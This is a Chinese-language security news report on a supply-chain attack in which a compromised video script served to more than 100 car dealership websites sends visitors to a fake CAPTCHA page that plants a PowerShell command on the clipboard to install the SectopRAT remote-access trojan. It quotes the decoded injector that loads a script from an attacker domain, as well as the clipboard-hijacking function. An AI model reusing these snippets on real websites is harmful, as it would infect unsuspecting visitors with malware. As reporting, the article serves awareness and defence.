一场精心策划的供应链攻击已致使全国 100 多家汽车经销商网络安全受侵,众多访客面临恶意软件感染风险。
此次攻击利用了汽车经销商常用的一种共享视频服务,注入恶意代码,将毫无防备的用户重定向到欺诈性网页,这些网页旨在在用户系统中安装危险的 SectopRAT 远程访问木马。
最初的入侵并非发生在经销商自己的网站上,而是通过汽车行业常用的第三方视频服务。
受影响的经销商网站访客在不知情的情况下接触到恶意 JavaScript 代码,该代码会将他们重定向到诱导交互的欺骗性页面。
安全研究员Randy McEoin确认,攻击源头是位于康涅狄格州曼彻斯特、服务于汽车行业的流媒体服务提供商 “idostream.com” 上托管的一个被入侵脚本。
被入侵的具体文件被确认为 “les_video_srp.js”,其中包含经过混淆处理的代码,用于加载更多恶意内容。
攻击触发时,会向访客展示一个虚假的验证码验证页面,声称用于验证 “我不是机器人”。
用户点击复选框后,会被指示执行一些操作,而这些操作会在其电脑上不知不觉地执行恶意代码。
该网页巧妙地操控了用户的剪贴板,插入了一条恶意 PowerShell 命令,一旦粘贴到 Windows 运行框中就会执行。
此次攻击在社会工程学手段上极为精妙,让受害者误以为自己只是在完成标准的验证流程,而实际上却在安装危险的恶意软件。
感染链条
感染始于一段经过混淆处理的 JavaScript 代码,解码后发现是一段简单脚本,用于向网页中插入额外代码:
var a = document.createElement(‘script’)
a.src = ‘https://security-confirmation.help/captchav2’
document.getElementsByTagName(‘head’)[0].appendChild(a)
这段脚本将用户重定向到 “deliveryoka.com” 上托管的一个 ClickFix 网页,该网页包含一个隐藏的 JavaScript 函数,用于将恶意代码放入用户剪贴板:
function setClipboardCopyData(textToCopy) {
const decodedText = textToCopy.replace(/’/g, “‘”).replace(/”/g, “\””);
const tempTextArea = document.createElement(“textarea”);
tempTextArea.value = decodedText;
document.body.append(tempTextArea);
tempTextArea.select();
document.execCommand(“copy”);
document.body.removeChild(tempTextArea);
}
执行时,PowerShell 命令会下载一个包含 SectopRAT 恶意软件的 ZIP 文件(Lancaster.zip),攻击者可借此远程访问受感染的系统,进而可能导致凭证被盗和数据泄露。
对该恶意软件的分析给出了满分 10 分的威胁评分,证实了其严重程度。
据报道,第三方服务提供商 LES Automotive 已对该问题进行了修复,不过入侵的全面程度以及受影响用户的数量仍不清楚。
发表评论
您还未登录,请先登录。
登录